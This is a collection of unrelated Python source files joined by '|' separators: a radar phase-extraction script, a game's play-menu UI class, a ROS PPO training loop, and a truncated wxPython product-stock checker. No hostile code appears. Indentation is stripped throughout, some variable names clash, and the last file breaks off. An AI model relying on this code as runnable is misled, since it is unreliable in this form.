def save_phase_data(bin_path, save_path, start_bin, end_bin, num_frames, chirp_index=5, is_diff=True):
if is_diff:
num_frames -= 1
# load Numpy Data
adc_data = np.fromfile(bin_path, dtype=np.int16)
adc_data = adc_data.reshape(numFrames, -1)
adc_data = np.apply_along_axis(DCA1000.organize, 1, adc_data, num_chirps=numChirpsPerFrame,
num_rx=numRxAntennas, num_samples=numADCSamples)
range_data = dsp.range_processing(adc_data, window_type_1d=Window.BLACKMAN)
range_data = arange_tx(range_data, num_tx=numTxAntennas)
range_data = range_data[:, chirp_index, :, start_bin:end_bin]
range_data = range_data.transpose((1, 2, 0))
# angle and unwrap
sig_phase = np.angle(range_data)
sig_phase = np.unwrap(sig_phase)
# save file
np.save(save_path, sig_phase)
print("{} npy file saved!".format(save_path))
def thread_job(queue, bin_path, out_path):
while not queue.empty():
q = queue.get()
bpath = os.path.join(bin_path, q)
hpath = os.path.join(out_path, q.replace("_Raw_0.bin", ""))
save_phase_data(bpath, hpath, start_bin=bin_start, end_bin=bin_end, num_frames=numFrames,
chirp_index=chirp_index, is_diff=is_diff)
queue.task_done()
if __name__ == '__main__':
root_path = "D:\\Subjects"
data_path = "{}_{}_Raw_0.bin"
output_data_path = "C:\\Users\\Zber\\Desktop\\Subjects_Phase"
# load radar configuration
numTxAntennas = 3
numRxAntennas = 4
configParameters = parseConfigFile(configFileName, numTxAnt=numTxAntennas)
numFrames = configParameters['numFrames']
numADCSamples = configParameters['numAdcSamples']
numLoopsPerFrame = configParameters['numLoops']
numChirpsPerFrame = numTxAntennas * numLoopsPerFrame
numRangeBins = numADCSamples
numDopplerBins = numLoopsPerFrame
# data settings
is_diff = True
save_config = True
bin_start = 5
bin_end = 15
chirp_index = 5
# start index
subs = ['S0', 'S1', 'S2', 'S3', 'S4', 'S5']
# subs = ['S0']
emotion_list = ['Joy', 'Surprise', 'Anger', 'Sadness', 'Fear', 'Disgust', 'Neutral']
queue = Queue()
start_index = 0
end_index = 30
for sub in subs:
for l, e in enumerate(emotion_list):
for i in range(start_index, end_index):
bin_path = os.path.join(root_path, sub, data_path.format(e, i))
relative_path = os.path.join(sub, data_path.format(e, i))
queue.put(relative_path)
if save_config:
import json
config = {
"Different": str(is_diff),
"Bin Start": bin_start,
"Bin End": bin_end,
"Data Start Index": start_index,
"Data End Index": end_index,
}
with open(os.path.join(output_data_path, 'config.json'), 'w') as f:
json.dump(config, f, indent=4)
# q = queue.get()
# bpath = os.path.join(root_path, q)
# hpath = os.path.join(output_data_path, q.replace("_Raw_0.bin", ""))
# save_phase_data(bpath, hpath, start_bin=bin_start, end_bin=bin_end, num_frames=numFrames, chirp_index=chirp_index,
# is_diff=is_diff)
NUM_THREADS = 16
for i in range(NUM_THREADS):
worker = threading.Thread(target=thread_job, args=(queue, root_path, output_data_path))
worker.start()
print('waiting for all tasks to be completed.', queue.qsize(), 'tasks')
print('This can take an hour or two depending on dataset size')
queue.join()
print('all done')
|
play.py
|
# Released under the MIT License. See LICENSE for details.
#
"""Provides the top level play window."""
from __future__ import annotations
from typing import TYPE_CHECKING
import _ba
import ba
if TYPE_CHECKING:
from typing import Optional, Tuple
class PlayWindow(ba.Window):
"""Window for selecting overall play type."""
def __init__(self,
transition: str = 'in_right',
origin_widget: ba.Widget = None):
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
import threading
# Preload some modules we use in a background thread so we won't
# have a visual hitch when the user taps them.
threading.Thread(target=self._preload_modules).start()
# We can currently be used either for main menu duty or for selecting
# playlists (should make this more elegant/general).
self._is_main_menu = not ba.app.ui.selecting_private_party_playlist
uiscale = ba.app.ui.uiscale
width = 1000 if uiscale is ba.UIScale.SMALL else 800
x_offs = 100 if uiscale is ba.UIScale.SMALL else 0
height = 550
button_width = 400
scale_origin: Optional[Tuple[float, float]]
if origin_widget is not None:
self._transition_out = 'out_scale'
scale_origin = origin_widget.get_screen_space_center()
transition = 'in_scale'
else:
self._transition_out = 'out_right'
scale_origin = None
self._r = 'playWindow'
super().__init__(root_widget=ba.containerwidget(
size=(width, height),
transition=transition,
toolbar_visibility='menu_full',
scale_origin_stack_offset=scale_origin,
scale=(1.6 if uiscale is ba.UIScale.SMALL else
0.9 if uiscale is ba.UIScale.MEDIUM else 0.8),
stack_offset=(0, 0) if uiscale is ba.UIScale.SMALL else (0, 0)))
self._back_button = back_button = btn = ba.buttonwidget(
parent=self._root_widget,
position=(55 + x_offs, height - 132),
size=(120, 60),
scale=1.1,
text_res_scale=1.5,
text_scale=1.2,
autoselect=True,
label=ba.Lstr(resource='backText'),
button_type='back')
txt = ba.textwidget(
parent=self._root_widget,
position=(width * 0.5, height - 101),
# position=(width * 0.5, height -
# (101 if main_menu else 61)),
size=(0, 0),
text=ba.Lstr(resource=(
self._r +
'.titleText') if self._is_main_menu else 'playlistsText'),
scale=1.7,
res_scale=2.0,
maxwidth=400,
color=ba.app.ui.heading_color,
h_align='center',
v_align='center')
ba.buttonwidget(edit=btn,
button_type='backSmall',
size=(60, 60),
label=ba.charstr(ba.SpecialChar.BACK))
if ba.app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
ba.textwidget(edit=txt, text='')
v = height - (110 if self._is_main_menu else 90)
v -= 100
clr = (0.6, 0.7, 0.6, 1.0)
v -= 280 if self._is_main_menu else 180
v += (30
if ba.app.ui.use_toolbars and uiscale is ba.UIScale.SMALL else 0)
hoffs = x_offs + 80 if self._is_main_menu else x_offs - 100
scl = 1.13 if self._is_main_menu else 0.68
self._lineup_tex = ba.gettexture('playerLineup')
angry_computer_transparent_model = ba.getmodel(
'angryComputerTransparent')
self._lineup_1_transparent_model = ba.getmodel(
'playerLineup1Transparent')
self._lineup_2_transparent_model = ba.getmodel(
'playerLineup2Transparent')
self._lineup_3_transparent_model = ba.getmodel(
'playerLineup3Transparent')
self._lineup_4_transparent_model = ba.getmodel(
'playerLineup4Transparent')
self._eyes_model = ba.getmodel('plasticEyesTransparent')
self._coop_button: Optional[ba.Widget] = None
# Only show coop button in main-menu variant.
if self._is_main_menu:
self._coop_button = btn = ba.buttonwidget(
parent=self._root_widget,
position=(hoffs, v + (scl * 15 if self._is_main_menu else 0)),
size=(scl * button_width,
scl * (300 if self._is_main_menu else 360)),
extra_touch_border_scale=0.1,
autoselect=True,
label='',
button_type='square',
text_scale=1.13,
on_activate_call=self._coop)
if ba.app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
ba.widget(edit=btn,
left_widget=_ba.get_special_widget('back_button'))
ba.widget(edit=btn,
up_widget=_ba.get_special_widget('account_button'))
ba.widget(
edit=btn,
down_widget=_ba.get_special_widget('settings_button'))
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(140, 30),
color=(0.72, 0.4, 1.0))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(185, 53),
color=(0.71, 0.5, 1.0))
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(220, 27),
color=(0.67, 0.44, 1.0))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(255, 57),
color=(0.7, 0.3, 1.0))
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * 230, v + scl * 153),
size=(scl * 115, scl * 115),
texture=self._lineup_tex,
model_transparent=angry_computer_transparent_model)
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + scl * 95),
size=(scl * button_width, scl * 50),
text=ba.Lstr(
resource='playModes.singlePlayerCoopText',
fallback_resource='playModes.coopText'),
maxwidth=scl * button_width * 0.7,
res_scale=1.5,
h_align='center',
v_align='center',
color=(0.7, 0.9, 0.7, 1.0),
scale=scl * 2.3)
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + (scl * 54)),
size=(scl * button_width, scl * 30),
text=ba.Lstr(resource=self._r +
'.oneToFourPlayersText'),
h_align='center',
v_align='center',
scale=0.83 * scl,
flatness=1.0,
maxwidth=scl * button_width * 0.7,
color=clr)
scl = 0.5 if self._is_main_menu else 0.68
hoffs += 440 if self._is_main_menu else 216
v += 180 if self._is_main_menu else -68
self._teams_button = btn = ba.buttonwidget(
parent=self._root_widget,
position=(hoffs, v + (scl * 15 if self._is_main_menu else 0)),
size=(scl * button_width,
scl * (300 if self._is_main_menu else 360)),
extra_touch_border_scale=0.1,
autoselect=True,
label='',
button_type='square',
text_scale=1.13,
on_activate_call=self._team_tourney)
if ba.app.ui.use_toolbars:
ba.widget(edit=btn,
up_widget=_ba.get_special_widget('tickets_plus_button'),
right_widget=_ba.get_special_widget('party_button'))
xxx = -14
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(xxx + 148, 30),
color=(0.2, 0.4, 1.0))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(xxx + 181, 53),
color=(0.3, 0.4, 1.0))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(xxx + 216, 33),
color=(0.3, 0.5, 1.0))
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(xxx + 245, 57),
color=(0.3, 0.5, 1.0))
xxx = 155
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(xxx + 151, 30),
color=(1.0, 0.5, 0.4))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(xxx + 189, 53),
color=(1.0, 0.58, 0.58))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(xxx + 223, 27),
color=(1.0, 0.5, 0.5))
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(xxx + 257, 57),
color=(1.0, 0.5, 0.5))
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + scl * 95),
size=(scl * button_width, scl * 50),
text=ba.Lstr(resource='playModes.teamsText',
fallback_resource='teamsText'),
res_scale=1.5,
maxwidth=scl * button_width * 0.7,
h_align='center',
v_align='center',
color=(0.7, 0.9, 0.7, 1.0),
scale=scl * 2.3)
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + (scl * 54)),
size=(scl * button_width, scl * 30),
text=ba.Lstr(resource=self._r +
'.twoToEightPlayersText'),
h_align='center',
v_align='center',
res_scale=1.5,
scale=0.9 * scl,
flatness=1.0,
maxwidth=scl * button_width * 0.7,
color=clr)
hoffs += 0 if self._is_main_menu else 300
v -= 155 if self._is_main_menu else 0
self._free_for_all_button = btn = ba.buttonwidget(
parent=self._root_widget,
position=(hoffs, v + (scl * 15 if self._is_main_menu else 0)),
size=(scl * button_width,
scl * (300 if self._is_main_menu else 360)),
extra_touch_border_scale=0.1,
autoselect=True,
label='',
button_type='square',
text_scale=1.13,
on_activate_call=self._free_for_all)
xxx = -5
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(xxx + 140, 30),
color=(0.4, 1.0, 0.4))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(xxx + 185, 53),
color=(1.0, 0.4, 0.5))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(xxx + 220, 27),
color=(0.4, 0.5, 1.0))
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(xxx + 255, 57),
color=(0.5, 1.0, 0.4))
xxx = 140
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(xxx + 148, 30),
color=(1.0, 0.9, 0.4))
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(xxx + 182, 53),
color=(0.7, 1.0, 0.5))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(xxx + 233, 27),
color=(0.7, 0.5, 0.9))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(xxx + 266, 53),
color=(0.4, 0.5, 0.8))
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + scl * 95),
size=(scl * button_width, scl * 50),
text=ba.Lstr(resource='playModes.freeForAllText',
fallback_resource='freeForAllText'),
maxwidth=scl * button_width * 0.7,
h_align='center',
v_align='center',
color=(0.7, 0.9, 0.7, 1.0),
scale=scl * 1.9)
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + (scl * 54)),
size=(scl * button_width, scl * 30),
text=ba.Lstr(resource=self._r +
'.twoToEightPlayersText'),
h_align='center',
v_align='center',
scale=0.9 * scl,
flatness=1.0,
maxwidth=scl * button_width * 0.7,
color=clr)
if ba.app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
back_button.delete()
ba.containerwidget(edit=self._root_widget,
on_cancel_call=self._back,
selected_child=self._coop_button
if self._is_main_menu else self._teams_button)
else:
ba.buttonwidget(edit=back_button, on_activate_call=self._back)
ba.containerwidget(edit=self._root_widget,
cancel_button=back_button,
selected_child=self._coop_button
if self._is_main_menu else self._teams_button)
self._restore_state()
@staticmethod
def _preload_modules() -> None:
"""Preload modules we use (called in bg thread)."""
import bastd.ui.mainmenu as _unused1
import bastd.ui.account as _unused2
import bastd.ui.coop.browser as _unused3
import bastd.ui.playlist.browser as _unused4
def _back(self) -> None:
# pylint: disable=cyclic-import
if self._is_main_menu:
from bastd.ui.mainmenu import MainMenuWindow
self._save_state()
ba.app.ui.set_main_menu_window(
MainMenuWindow(transition='in_left').get_root_widget())
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
else:
from bastd.ui.gather import GatherWindow
self._save_state()
ba.app.ui.set_main_menu_window(
GatherWindow(transition='in_left').get_root_widget())
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
def _coop(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account import show_sign_in_prompt
from bastd.ui.coop.browser import CoopBrowserWindow
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
CoopBrowserWindow(
origin_widget=self._coop_button).get_root_widget())
def _team_tourney(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.playlist.browser import PlaylistBrowserWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
PlaylistBrowserWindow(
origin_widget=self._teams_button,
sessiontype=ba.DualTeamSession).get_root_widget())
def _free_for_all(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.playlist.browser import PlaylistBrowserWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
PlaylistBrowserWindow(
origin_widget=self._free_for_all_button,
sessiontype=ba.FreeForAllSession).get_root_widget())
def _draw_dude(self, i: int, btn: ba.Widget, hoffs: float, v: float,
scl: float, position: Tuple[float, float],
color: Tuple[float, float, float]) -> None:
h_extra = -100
v_extra = 130
eye_color = (0.7 * 1.0 + 0.3 * color[0], 0.7 * 1.0 + 0.3 * color[1],
0.7 * 1.0 + 0.3 * color[2])
if i == 0:
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0]),
v + scl * (v_extra + position[1])),
size=(scl * 60, scl * 80),
color=color,
texture=self._lineup_tex,
model_transparent=self._lineup_1_transparent_model)
ba.imagewidget(
parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0] + 12),
v + scl * (v_extra + position[1] + 53)),
size=(scl * 36, scl * 18),
texture=self._lineup_tex,
color=eye_color,
model_transparent=self._eyes_model)
elif i == 1:
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0]),
v + scl * (v_extra + position[1])),
size=(scl * 45, scl * 90),
color=color,
texture=self._lineup_tex,
model_transparent=self._lineup_2_transparent_model)
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0] + 5),
v + scl * (v_extra + position[1] + 67)),
size=(scl * 32, scl * 16),
texture=self._lineup_tex,
color=eye_color,
model_transparent=self._eyes_model)
elif i == 2:
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0]),
v + scl * (v_extra + position[1])),
size=(scl * 45, scl * 90),
color=color,
texture=self._lineup_tex,
model_transparent=self._lineup_3_transparent_model)
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0] + 5),
v + scl * (v_extra + position[1] + 59)),
size=(scl * 34, scl * 17),
texture=self._lineup_tex,
color=eye_color,
model_transparent=self._eyes_model)
elif i == 3:
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0]),
v + scl * (v_extra + position[1])),
size=(scl * 48, scl * 96),
color=color,
texture=self._lineup_tex,
model_transparent=self._lineup_4_transparent_model)
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0] + 2),
v + scl * (v_extra + position[1] + 62)),
size=(scl * 38, scl * 19),
texture=self._lineup_tex,
color=eye_color,
model_transparent=self._eyes_model)
def _save_state(self) -> None:
try:
sel = self._root_widget.get_selected_child()
if sel == self._teams_button:
sel_name = 'Team Games'
elif self._coop_button is not None and sel == self._coop_button:
sel_name = 'Co-op Games'
elif sel == self._free_for_all_button:
sel_name = 'Free-for-All Games'
elif sel == self._back_button:
sel_name = 'Back'
else:
raise ValueError(f'unrecognized selection {sel}')
ba.app.ui.window_states[type(self)] = sel_name
except Exception:
ba.print_exception(f'Error saving state for {self}.')
def _restore_state(self) -> None:
try:
sel_name = ba.app.ui.window_states.get(type(self))
if sel_name == 'Team Games':
sel = self._teams_button
elif sel_name == 'Co-op Games' and self._coop_button is not None:
sel = self._coop_button
elif sel_name == 'Free-for-All Games':
sel = self._free_for_all_button
elif sel_name == 'Back':
sel = self._back_button
else:
sel = (self._coop_button if self._coop_button is not None else
self._teams_button)
ba.containerwidget(edit=self._root_widget, selected_child=sel)
except Exception:
ba.print_exception(f'Error restoring state for {self}.')
|
PPO_run.py
|
#!/usr/bin/env python3
import threading, queue
import time
import os
import shutil
import numpy as np
import math
import rospy
from ppo import PPO
from env_v5 import Test
MAX_EPISODES = 100000
MAX_EP_STEPS = 400
MEMORY_CAPACITY = 10000
SIDE = ['right_', 'left_']
GOAL_REWARD = 1500
LOAD = False
def train(nameIndx):
global left_run, right_run
T_REWARD = []
MU_REWARD = 0
BEST_R = 0
env = Test(nameIndx) #0 = right
# agent = DDPG(a_dim, s_dim, a_bound, SIDE[nameIndx])
agent = PPO(act_dim=8, obs_dim=39,
lr_actor=0.0001, lr_value=0.0002, gamma=0.9, clip_range=0.2, name=SIDE[nameIndx])
var = 0.8 # control exploration
rar = 0.3
cnt = 0
t1 = time.time()
while int(time.time())%5 != 0:
nameIndx = nameIndx
for i in range(MAX_EPISODES):
while right_run or left_run:
nameIndx = nameIndx
s = env.reset()
while int(time.time())%2 != 0:
nameIndx = nameIndx
if nameIndx == 0:
right_run = True
elif nameIndx == 1:
left_run = True
ep_reward = 0
for j in range(MAX_EP_STEPS):
a, neglogp, _ = agent.choose_action(s)
# a = np.clip(np.random.normal(a, var), -1, 1) # add randomness to action selection for exploration
s_, r, done, info = env.step(a)
agent.memory.store_transition(s, a, (r+8)/8, neglogp)
if (j + 1) % 32 == 0 or j == MAX_EP_STEPS - 1:
_, _, last_value = agent.choose_action(s_)
agent.learn(last_value, done, cnt)
s = s_
ep_reward += r
cnt+=1
if len(T_REWARD) >= 100:
T_REWARD.pop(0)
T_REWARD.append(ep_reward)
r_sum = 0
for k in T_REWARD:
r_sum += k
MU_REWARD = r_sum/100
BEST_R = MU_REWARD if MU_REWARD>BEST_R else BEST_R
print('Episode:', i, ' Reward: %i' % int(ep_reward), 'MU_REWARD: ', int(MU_REWARD),'BEST_R: ', int(BEST_R), 'cnt = ',j)# , 't_step:', int(t23), 't_learn: ', int(t32)) #'var: %.3f' % var, 'rar: %.3f' % rar)
if MU_REWARD > GOAL_REWARD:
break
if nameIndx == 0:
right_run = False
elif nameIndx == 1:
left_run = False
if os.path.isdir(agent.path): shutil.rmtree(agent.path)
os.mkdir(agent.path)
ckpt_path = os.path.join(agent.path, 'DDPG.ckpt')
save_path = agent.saver.save(agent.sess, ckpt_path, write_meta_graph=False)
print("\nSave Model %s\n" % save_path)
print('Running time: ', time.time() - t1)
def action_sample(s):
a = s[8:16]
a[:3] /= np.linalg.norm(a[:3])
a[3:7]/= np.linalg.norm(a[3:7])
a[7] /= math.fabs(a[7])
a[:3] *= s[-3]
a[3:7]*= s[-2]
a[7] *= s[-1]
return a
if __name__ == '__main__':
rospy.init_node('a')
threads = []
left_run = False
right_run = False
for i in range(2):
t = threading.Thread(target=train, args=(i,))
threads.append(t)
for i in range(2):
threads[i].start()
|
gui.py
|
#/usr/bin/python3
# https://github.com/tnware/product-checker
# by Tyler Woods
# coded for Bird Bot and friends
# https://tylermade.net
# -*- coding: utf-8 -*-
import wx
import wx.xrc
import json
import requests
import time
from datetime import datetime
import urllib.parse as urlparse
from urllib.parse import parse_qs
from threading import Thread
from selenium import webdriver
from chromedriver_py import binary_path as driver_path
from lxml import html
#put maxprice to 0 for defaults (any), set it to a plain number for example 300 with no quotes to ignore anything that is listed over 300.
#only applies to walmart URLs for right now
#maxprice = 300
maxprice = 0
###########################################################################
## Class WebhookManager
###########################################################################
class WebhookManager ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Manage Webhooks", pos = wx.DefaultPosition, size = wx.Size( 354,199 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
outer = wx.BoxSizer( wx.VERTICAL )
self.panel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
box = wx.BoxSizer( wx.HORIZONTAL )
self.btnPanel = wx.Panel( self.panel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
btnbox = wx.BoxSizer( wx.VERTICAL )
self.newBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"New", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.newBtn, 0, wx.ALL, 5 )
self.renBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Update", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.renBtn, 0, wx.ALL, 5 )
self.delBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Delete", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.delBtn, 0, wx.ALL, 5 )
self.clrBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Clear All", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.clrBtn, 0, wx.ALL, 5 )
self.btnPanel.SetSizer( btnbox )
self.btnPanel.Layout()
btnbox.Fit( self.btnPanel )
box.Add( self.btnPanel, 0, wx.EXPAND |wx.ALL, 5 )
self.listPanel = wx.Panel( self.panel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
lstbox = wx.BoxSizer( wx.VERTICAL )
#webhookListChoices = []
self.webhookList = wx.ListBox( self.listPanel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, webhookListChoices, 0 )
lstbox.Add( self.webhookList, 1, wx.ALL|wx.EXPAND, 5 )
self.listPanel.SetSizer( lstbox )
self.listPanel.Layout()
lstbox.Fit( self.listPanel )
box.Add( self.listPanel, 1, wx.EXPAND |wx.ALL, 5 )
self.panel.SetSizer( box )
self.panel.Layout()
box.Fit( self.panel )
outer.Add( self.panel, 1, wx.EXPAND, 5 )
self.SetSizer( outer )
self.Layout()
self.Centre( wx.BOTH )
# Connect Events
self.newBtn.Bind( wx.EVT_BUTTON, self.NewItem )
self.renBtn.Bind( wx.EVT_BUTTON, self.OnUpdate )
self.delBtn.Bind( wx.EVT_BUTTON, self.OnDelete )
self.clrBtn.Bind( wx.EVT_BUTTON, self.OnClear )
def __del__( self ):
pass
def NewItem(self, event):
webhook_dict = return_data("./data/webhooks.json")
webhook_url = wx.GetTextFromUser('Enter a Webhook URL', 'Insert dialog')
if webhook_url != '':
webhook_name = wx.GetTextFromUser('Give the webhook URL a friendly name', 'Insert dialog')
self.webhookList.Append(webhook_name)
set_data("./data/webhooks.json", webhook_name, webhook_url)
webhook_dict = return_data("./data/webhooks.json")
webhookListChoices.append(webhook_name)
def OnUpdate(self, event):
webhook_dict = return_data("./data/webhooks.json")
sel = self.webhookList.GetSelection()
text = self.webhookList.GetString(sel)
webhook_to_modify = webhook_dict[text]
modified_webhook_url = wx.GetTextFromUser('Update item', 'Update Item dialog', webhook_to_modify)
if modified_webhook_url != '':
webhook_dict.update({text: modified_webhook_url})
set_data("./data/webhooks.json", text, modified_webhook_url)
webhook_dict = return_data("./data/webhooks.json")
#self.webhookList.Delete(sel)
#item_id = self.webhookList.Insert(renamed, sel)
#self.webhookList.SetSelection(item_id)
def OnDelete(self, event):
webhook_dict = return_data("./data/webhooks.json")
sel = self.webhookList.GetSelection()
text = self.webhookList.GetString(sel)
if sel != -1:
self.webhookList.Delete(sel)
del webhook_dict[text]
with open("./data/webhooks.json", "w") as file:
json.dump(webhook_dict, file)
file.close()
webhook_dict = return_data("./data/webhooks.json")
def OnClear(self, event):
self.webhookList.Clear()
with open("./data/webhooks.json", "w") as file:
json.dump({}, file)
file.close()
webhook_dict = return_data("./data/webhooks.json")
###########################################################################
## Class WebhookDialog
###########################################################################
class WebhookDialog ( wx.Dialog ):
def __init__( self, parent ):
wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Assign Webhook", pos = wx.DefaultPosition, size = wx.Size( 201,103 ), style = wx.DEFAULT_DIALOG_STYLE )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
vbox = wx.BoxSizer( wx.VERTICAL )
self.pnl = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
vbox.Add( self.pnl, 1, wx.EXPAND |wx.ALL, 5 )
comboChoices = []
self.combo = wx.ComboBox( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, comboChoices, 0 )
vbox.Add( self.combo, 0, wx.ALL|wx.EXPAND, 5 )
self.okButton = wx.Button( self, wx.ID_ANY, u"Okay", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox.Add( self.okButton, 0, wx.ALL|wx.EXPAND, 5 )
self.SetSizer( vbox )
self.Layout()
self.Centre( wx.BOTH )
# Connect Events
self.okButton.Bind( wx.EVT_BUTTON, self.update )
webhook_dict = return_data("./data/webhooks.json")
for k in webhook_dict:
self.combo.Append(k)
def update(self, e):
try:
selected = ex.list.GetFocusedItem()
i = selected
url = ex.list.GetItemText(i, col=0)
new_webhook_key = self.combo.GetSelection()
new_webhook = self.combo.GetString(new_webhook_key)
if new_webhook != "":
print(url, new_webhook)
urldict.update({url: new_webhook})
set_data("./data/products.json", url, new_webhook)
ex.list.SetItem(i, 1, new_webhook)
num = ex.list.GetItemCount()
else:
print("select a webhook first")
except:
print("An error ocurred. Did you select a URL before clicking Edit?")
self.Close()
self.Close()
def OnClose(self, e):
self.Destroy()
def __del__( self ):
pass
###########################################################################
## Class GUI
###########################################################################
class GUI ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Product Checker", pos = wx.DefaultPosition, size = wx.Size( 1009,660 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
hbox = wx.BoxSizer( wx.HORIZONTAL )
self.leftPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
vbox2 = wx.BoxSizer( wx.VERTICAL )
self.icon = wx.StaticBitmap( self.leftPanel, wx.ID_ANY, wx.Bitmap( u"img/icon.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.icon, 0, wx.ALL|wx.EXPAND, 15 )
self.whBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Manage Webhooks", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.whBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.addBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Add Product URL", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.addBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.editBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Edit Highlighted Item", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.editBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.delBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Delete Highlighted Item", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.delBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.strtAllBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"START All Jobs", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.strtAllBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.app2Btn = wx.Button( self.leftPanel, wx.ID_ANY, u"STOP All Jobs", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.app2Btn, 0, wx.ALL|wx.EXPAND, 5 )
vbox2.Add( ( 0, 0), 1, wx.EXPAND, 5 )
self.leftPanel.SetSizer( vbox2 )
self.leftPanel.Layout()
vbox2.Fit( self.leftPanel )
hbox.Add( self.leftPanel, 0, wx.EXPAND, 5 )
self.rightPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
vbox = wx.BoxSizer( wx.VERTICAL )
